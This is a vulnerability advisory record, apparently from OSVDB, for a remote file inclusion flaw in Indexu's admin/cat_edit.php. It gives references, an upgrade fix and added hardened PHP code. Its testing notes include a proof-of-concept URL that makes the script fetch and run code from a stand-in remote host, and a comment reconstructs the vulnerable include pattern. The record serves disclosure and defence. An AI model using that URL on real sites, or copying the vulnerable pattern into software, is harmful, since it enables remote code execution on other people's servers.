Indexu admin/cat_edit.php admin_template_path Variable Remote File Inclusion

2006-06-16T00:00:00
ID OSVDB:39353
Type osvdb
Reporter OSVDB
Modified 2006-06-16T00:00:00

Description

Vulnerability Description

Indexu contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to admin/cat_edit.php not properly sanitizing user input supplied to the 'admin_template_path' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Upgrade to version 5.1.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

http://[target]/indexu/admin/cat_edit.php?admin_template_path=http://evilcode.txt?
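The pattern behind this bug class and one way to close it, as an added illustration that is not Indexu's own code: the variable name admin_template_path and the script name cat_edit.php come from the record above; the include statement, the template directory layout and the allowlist of template names are assumptions.

```php
<?php
// Illustrative reconstruction of the vulnerable pattern (assumed, not Indexu's source).
// When $admin_template_path comes straight from the request (register_globals or a
// direct $_GET read) and allow_url_fopen / allow_url_include is on, PHP fetches the
// attacker's URL and executes what it returns:
//
//   $admin_template_path = $_GET['admin_template_path'];
//   include($admin_template_path . 'cat_edit.html');   // RFI: remote code runs here
//
// The trailing "?" in the testing note above turns the appended filename into a
// query string, so the remote file is fetched unchanged.

// Hardened form: never build an include path from request data. Fix the template
// root at install time and accept only a template *name* from a fixed allowlist.
define('ADMIN_TEMPLATE_ROOT', __DIR__ . '/../templates/admin');   // assumed layout

function admin_template_file($requested)
{
    // Template names cat_edit.php may load (assumed); anything else falls back.
    $allowed = array('default', 'classic');
    if (!in_array($requested, $allowed, true)) {
        $requested = 'default';
    }
    $path = ADMIN_TEMPLATE_ROOT . '/' . $requested . '/cat_edit.html';

    // Defence in depth: resolve ".." and symlinks, then confirm the file is still
    // under the template root. A URL never passes realpath(), so RFI is excluded too.
    $real = realpath($path);
    $root = realpath(ADMIN_TEMPLATE_ROOT);
    if ($real === false || $root === false
        || strncmp($real, $root . '/', strlen($root) + 1) !== 0) {
        throw new RuntimeException('template resolved outside ADMIN_TEMPLATE_ROOT');
    }
    return $real;
}

// The parameter may still be present, but it only ever selects an allowlisted name.
$template = isset($_GET['admin_template_path'])
    ? (string) $_GET['admin_template_path']
    : 'default';
include admin_template_file($template);
```

Independently of the code fix, setting allow_url_include = Off (and, where nothing needs it, allow_url_fopen = Off) in php.ini removes the remote-fetch primitive for every include in the application.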

References:

Vendor URL: http://www.nicecoder.com/
Security Tracker: 1016330
Secunia Advisory ID: 18752
Related OSVDB IDs: 39355, 39353, 1018037, 1018038, 1018039, 1018041, 1018043, 1018044, 1018046, 1018047, 1018052, 1018058, 1018061, 1018072, 1018074, 1018076, 1018077, 1018080, 1018082, 1018084, 1018089, 1018090, 1018033, 1018040, 1018053, 1018054, 1018055, 1018057, 1018067, 1018070, 1018073, 1018078, 1018086, 1018032, 39354, 1018042, 1018056, 1018059, 1018060, 1018063, 1018064, 1018065, 1018071, 1018081, 1018085, 1018087, 1018036, 1018045, 1018048, 1018049, 1018050, 1018051, 1018062, 1018066, 1018068, 1018069, 1018075, 1018079, 1018083, 1018088
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0318.html
ISS X-Force ID: 27262
CVE ID: CVE-2006-7017